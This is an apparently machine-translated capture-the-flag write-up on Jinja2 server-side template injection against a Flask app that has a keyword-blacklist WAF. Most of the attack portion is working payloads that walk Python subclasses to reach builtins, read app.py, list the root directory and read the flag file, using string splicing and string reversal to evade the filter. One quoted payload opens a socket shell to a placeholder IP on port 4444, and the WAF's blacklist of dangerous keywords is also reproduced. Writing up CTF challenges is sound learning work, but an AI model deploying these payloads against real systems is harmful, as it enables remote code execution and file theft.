Examination site

        flask Of ssti Template Injection

        ssti Template injection bypass         

        ping Code generation

information gathering

The beginning gives encryption, decryption and prompt Hint let's try hard （ It doesn't seem to work

Then decrypt the random input and find debug Open the

Then I saw part of the source code

Is probably text Parameters bypass waf You can execute the code

use { {6+6}} Encryption and decryption get 12 Make sure there is ssti Template Injection

Reference knowledge

         stay jinja2 in Control structure  {% %}  Variable value  { { }}

        python Magic methods and attributes

                __class__                  Returns the parameter type of the call

                __bases__                Returns a list of base classes

                __mro__                    This attribute is the reference class tuple when looking for the base class during method parsing

                __subclasses__()      Return to the list of dictionaries

                __globals__              Returns the global variables defined by the global namespace of the function and func_globals Equivalent

                __builtins__               References to built-in modules , Visible anywhere （ Including the overall situation ）, Every Python Scripts are automatically loaded , This module includes many powerful built-in function , for example eval,exec,open wait

The specific process       

        Read the complete app.py Convenient bypass waf

        Reference resources Templates Injections Of payload

{% for x in ().__class__.__base__.__subclasses__() %}
{% if "warning" in x.__name__ %}
{
   {x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}
{%endif%}{% endfor %}

        Change to

{% for x in [].__class__.__base__.__subclasses__() %}
{% if x.__name__=='catch_warnings' %}
{
   { x.__init__.__globals__['__builtins__'].open('app.py','r').read() }}
{% endif %}{% endfor %}

  Change to one line

{% for x in [].__class__.__base__.__subclasses__() %}{% if x.__name__=='catch_warnings' %}{
   { x.__init__.__globals__['__builtins__'].open('app.py').read() }}{% endif %}{% endfor %}

  Get a lump

 waf

def waf(str): 
    black_list = [&
    #34;flag","os","system",&
    #34;popen","import","eval",&
    #34;chr","request", "subprocess",&
    #34;commands","socket","hex",&
    #34;base64","*","?"
] 
    for x in black_list :
        if x in str.lower() : return [email protected]('/hint',methods=['GET'])

  Know some keywords and turn characters to lowercase , So it can't be used lower perhaps base64、hex Bypass , But string splicing can bypass use listdir Method to view the current directory file

{% for x in [].__class__.__base__.__subclasses__() %}{% if x.__name__=='catch_warnings' %}{
   { x.__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').listdir('/')}}{% endif %}{% endfor %}

obtain

['bin', 'boot', 'dev', 'etc', 'home', 'lib', 'lib64', 'media', 'mnt', 'opt', 'proc', 'root', 'run', 'sbin', 'srv', 'sys', 'tmp', 'usr', 'var', 'this_is_the_flag.txt', '.dockerenv', 'app']

See this_is_the_flag.txt Then splice open Read

{% for x in [].__class__.__base__.__subclasses__() %}{% if x.__name__=='catch_warnings' %}{
   { x.__init__.__globals__['__builtins__'].open('/this_is_the_fl'+'ag.txt').read()}}{% endif %}{% endfor %}

  Come on

  Flashback output bypasses

        txt.galf_eht_si_siht/’[::-1] Reverse the character output

        Namely this_is_the_flag.txt  

{% for x in [].__class__.__base__.__subclasses__() %}{% if x.__name__=='catch_warnings' %}{
   { x.__init__.__globals__['__builtins__'].open('txt.galf_eht_si_siht/'[::-1]).read()}}{% endif %}{% endfor %}

  utilize PIN Code process RCE

I haven't done this yet Keep it first There is a little problem in the calculation pin On the yard

OK, swing